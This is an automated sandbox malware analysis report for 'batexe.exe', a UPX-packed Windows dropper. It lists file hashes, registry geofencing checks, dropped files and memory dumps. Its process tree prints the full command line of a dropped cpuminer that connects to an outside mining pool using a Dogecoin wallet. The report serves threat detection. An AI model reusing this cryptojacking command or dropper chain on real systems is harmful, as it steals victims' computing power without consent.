73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 02:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1604	b2e.exe
1180	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1180	cpuminer-sse2.exe
1180	cpuminer-sse2.exe
1180	cpuminer-sse2.exe
1180	cpuminer-sse2.exe
1180	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/400-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 400 wrote to memory of 1604	400	batexe.exe	89
PID 400 wrote to memory of 1604	400	batexe.exe	89
PID 400 wrote to memory of 1604	400	batexe.exe	89
PID 1604 wrote to memory of 5080	1604	b2e.exe	90
PID 1604 wrote to memory of 5080	1604	b2e.exe	90
PID 1604 wrote to memory of 5080	1604	b2e.exe	90
PID 5080 wrote to memory of 1180	5080	cmd.exe	93
PID 5080 wrote to memory of 1180	5080	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:400
- C:\Users\Admin\AppData\Local\Temp\8F40.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8F40.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8F40.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\949F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5080
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8F40.tmp\b2e.exe

Filesize
10.2MB

MD5
4fc6ceb5a786aedf1d5b756eeeff8121

SHA1
05db2f8d431c56c77670d8e67b27dea9377f6533

SHA256
40e91ad529ba29192a80bfc341adc93622e45694d04614f2416aa6b9b60f6413

SHA512
6569c1a0e650878056b8307b8deca85f80f64025c060233ff911668aa06e5682e1dff7c9b3776cc55b25962740f9839142b18f336155c3201d9c4be76d8c4530

Download Submit
C:\Users\Admin\AppData\Local\Temp\8F40.tmp\b2e.exe

Filesize
4.1MB

MD5
98c70124585da1ecd7e4ac7aabd5e439

SHA1
50487c834bec8131c5b0a6fcb4b6ab4e3bfc79e1

SHA256
38b31f1e4f71a111c603ee5af5f641fe34606880744a2a7ec3d8482022545fdc

SHA512
9b19c19779ec4e057a5187c06b2bbc3b501857fea1563514a1159e17ad89ff6675d1c918f43e623ecc160fb0a3428d6ac6aa837b3ac1c7dcc25a7734250077ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\8F40.tmp\b2e.exe

Filesize
2.7MB

MD5
9e630039e02e5a2c835d691cea4ad792

SHA1
f89a90f805e616176e0c716e9c85c785a5c34685

SHA256
3a1df3c21f9e4c5ac50e0dad15c1590aac9fa1ee8a7e49d8d55382b1785f09ae

SHA512
d451039dceadc4b687f0b40b479c73f5b3e887bef8757799793c689951c051afd2b657c11e5135917159c4d81943459273bc806e20137e3b3ffb100ce93b8331

Download Submit
C:\Users\Admin\AppData\Local\Temp\949F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
411KB

MD5
c192ca391717c8949270e8e36bd12241

SHA1
b0365af2957c16872472046e21268779661d222a

SHA256
fb74585d52283482d095d33c9de6a0fc1a20b9c03d9bbe9d37963f825980a538

SHA512
7134c693e0986c3eff264a95376534987760f8b49de94e488a26565c8e621c7dbb8034e860204b6b3ad1bd00b6785dc1be7210f027a80d1b0f42b794801e1410

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
332KB

MD5
d9a02679cee280f7f885c05e907e173e

SHA1
99cce92433090ae57c77619b41653a868d0b75fa

SHA256
160f17ec35fb8b1295b7351fbc6683412e867ae3f0a953bb746fe21eeb4d97f9

SHA512
79535ca80d512643891c18c937c78743d853525b9ea3bced671201b1b513c74fe66f7db5b4fb8037646979c7661416a2ce0c983737046042e2eec10647c880d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
131KB

MD5
a441efa934873a16a932108a2542aa82

SHA1
c5e6befa7c3fed57985272045d9a3e10b037951d

SHA256
1d1375d30e236ba5370032f2d807642871ef41cb3b550191cd31f4a9c5db2bca

SHA512
06efe8f12523057a4fb17d7714ff8b7ac314f5e4923d1a1b979fbf3a9c88e6a29f6e23b4dc7ffa5757581884509355526c92fe08ed6a4debcaa95ca342e9acc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
81KB

MD5
d29e2fcfc04606b3beca5c6a74393b02

SHA1
e138c6b51bb64134dc75b923782a0b71b2a29e58

SHA256
1a1a123ffe952a6d2aef5d85b267aeee0bb0e5d87df67bebf2b1db22c06c6399

SHA512
1c48f9c87424f50cf75be44255618c7fb17c398008fa53a998b468bcf1355c068e6ff87e89695711932584e036eacc915988bd9ca951290d82c482b8dd7a6d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
85KB

MD5
ac6626a1679e42cc77ccbd48fbb83cd8

SHA1
4a9785408a675fbe8b2bce023badbe1b13345647

SHA256
ccd75092406904102d2423c4606a72ffe122b6ff5e67d94aaada9c673f6a560f

SHA512
3684e5c6db17cff356dd23ad16cbafe0d5e3b332e9f8e846a416f827f39bad3c511c94d8aca9c5dc6012a0969851b30028b6be0590f4a4925eb483cd6107df45

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
201KB

MD5
f61f16b245bd1ef8d1e5c8620e6d9f53

SHA1
5976e5355942c0913c2dd644f3cf8f3a6e2782d1

SHA256
37fce8c56267b56c8af65cd31d537915092994e1b8316895d4005e93c2afdacf

SHA512
0446cddcaee5733f26c43ab4070dff19653d1bc99fcb207a05e5106cc9807cfca04d19b7123c36f7231bcecf934ea9dd6cc8ebca342e4f9e58e47e2c3674bfa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
64KB

MD5
e98583e2f3157ea2561f40a91a79b195

SHA1
770932f48dbea7a78a3b21e3df65e329a27313ff

SHA256
f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2

SHA512
cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
99KB

MD5
4d20dd325c882bd8dcd553dd3ac94792

SHA1
1012afc28d2083ce87e2d96b353f92c389057368

SHA256
1b63a886dba004d8ac6291f7303bebb3ad8cf629e6567fc834953892affd4561

SHA512
aaa664af6da948877e98f178c4061b51869ab502afe472032109c1b260ee7ffc00ba7b13e69d2d8b7f8bc10d3bf8928b25d1daf94836e973b064373e226936fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
103KB

MD5
d93a4a3e0a057bea4198714fff47b990

SHA1
e87441959473a67136e8909fa13321f6db81e9ba

SHA256
377f672e38db1952e1e80413b125b774bd77c93fb06280fd41aa2ff510269e15

SHA512
023f6a8af7bc968a5906ef01b587f85dbb58e2501593a0285d3f85ec5a1d5d7df9ea74971aa3d8b02bdff026a0951b1648e0877c75bff8576f8a8773f899f8ad

Download Submit
memory/400-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1180-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-63-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1180-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1180-46-0x00000000609A0000-0x0000000060A38000-memory.dmp

Filesize
608KB

Download
memory/1180-47-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/1180-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-68-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-108-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1180-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1604-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download